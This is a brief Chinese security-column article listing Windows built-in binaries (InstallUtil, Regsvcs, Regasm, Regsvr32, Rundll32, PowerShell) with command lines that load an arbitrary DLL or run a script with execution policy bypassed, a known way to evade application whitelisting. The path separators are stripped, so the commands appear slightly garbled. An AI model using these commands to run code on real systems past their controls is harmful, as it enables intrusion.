InstallUtil.exe
Regsvcs.exe
Regasm.exe
Regsvr 32.exe
Rundll32.exe
Powershell
详细用法如下:
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
C:WindowsMicrosoft.NETFramework64v4.0.3031964InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe AllTheThings.dll
x64
C:WindowsMicrosoft.NETFramework64v4.0.30319regsvcs.exe AllTheThings.dll
3.
C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U AllTheThings.dll
x64
C:WindowsMicrosoft.NETFramework64v4.0.30319regasm.exe /U AllTheThings.dll
regsvr 32 /s /u AllTheThings.dll --> Calls DllUnregisterServer
x64
regsvr 32 /s AllTheThings.dll --> Calls DllRegisterServer
rundll32 AllTheThings.dll,EntryPoint
直接使用powershell,加载powershell模块,具体使用的方式如下:
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本文作者:Ms08067安全实验室
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/128621.html